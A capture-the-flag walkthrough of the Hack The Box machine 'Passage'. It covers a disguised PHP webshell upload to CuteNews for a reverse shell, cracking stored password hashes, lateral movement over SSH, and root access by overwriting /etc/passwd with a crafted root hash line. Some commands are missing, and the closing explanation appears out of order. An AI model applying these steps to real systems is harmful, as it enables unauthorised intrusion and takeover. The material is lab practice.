As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Tue May 17 20:21:13 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.206
Warning: 10.10.10.206 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.206
Host is up (0.061s latency).
Not shown: 65391 closed tcp ports (reset), 142 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Tue May 17 20:21:32 2022 -- 1 IP address (1 host up) scanned in 18.96 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80 10.10.10.206 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Tue May 17 20:21:50 2022 as: nmap -sCV -p22,80 -Pn -oN targeted 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Passage News
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 17 20:22:02 2022 -- 1 IP address (1 host up) scanned in 11.67 seconds
If we scan the website with the whatweb tool, we'll see the passage.htb domain name in one of the emails. We can also see that the website is powered by CuteNews.
If we add /CuteNews to the URL, we'll see a login page.
http://10.10.10.206/CuteNews/
Let's register a new user.
Now, let's press on the Personal options button.
Then, we'll see that we can upload files. The idea here is to upload a PHP webshell as the Avatar of the user, and then access it and send us a reverse shell. To be able to upload the PHP webshell, we'll have to uploaded as a GIF. First, let's create the webshell.php file with the following content. The first line will indicate that the file is a GIF file.
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
By default, CuteNews store the user's information in the /CuteNews/cdata/users/ directory, which has the lines file with various information including the password hashes. The following command will show that file and decode it.
If we put those hashes in crackstation, we'll get the atlanta1 and egre55 passwords.
CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.
Now, we could try to become either the user paul or nadav with the passwords that we have. If we try the password atlanta1 we could get a shell as paul. Then we could grab the user flag.
su paul
Password: atlanta1
paul@passage:/var/www/html/CuteNews/uploads$ whoami
paul
paul@passage:/var/www/html/CuteNews/uploads$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/uploads$ cd
paul@passage:~$ cat user.txt
d752ce000696474d0335721f1bcdea17
At this point, I started enumerating the machine, and I saw that we have the user nadavSSH key in the authorized_keys file, so that means that we can log in via SSH with the user nadav without giving any password.
The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured.
ssh nadav@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:oRyj2rNWOCrVh9SCgFGamjppmxqJUlGgvI4JSVG75xg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ whoami
nadav
If we take a look at the hidden files of the nadav home directory, we'll see the .viminfo file.
Now, we'll have to create a hash for the new password of the root user, which will be test.
openssl passwd
Password: test
Verifying - Password: test
P3RUTh5RKzvg6
Now, in the /etc/passwd copy, change the x character next to the root user to the password hash we just made.
root:P3RUTh5RKzvg6:0:0:root:/root:/bin/bash
Finally, if we run the following commando, we will replace our custom passwd file with the original /etc/passwd file, and then we'll be able to get a shell as root.
Now, all we have to do is become the root user, and reap the harvest and take the root flag.
su root
Password: test
root@passage:/tmp# whoami
root
root@passage:/tmp# cat /root/root.txt
72bcc6caaeb19b74b7fc6806858757c5
explains how we can exploit this vulnerability, which basically allow us to copy a file with root permissions. The idea is to make a copy of the /etc/passwd file, then modify it changing the root password, and finally replace it with the original /etc/passwd so we can become root. First, let's go to the /tmp folder and make a copy of the /etc/passwd file.
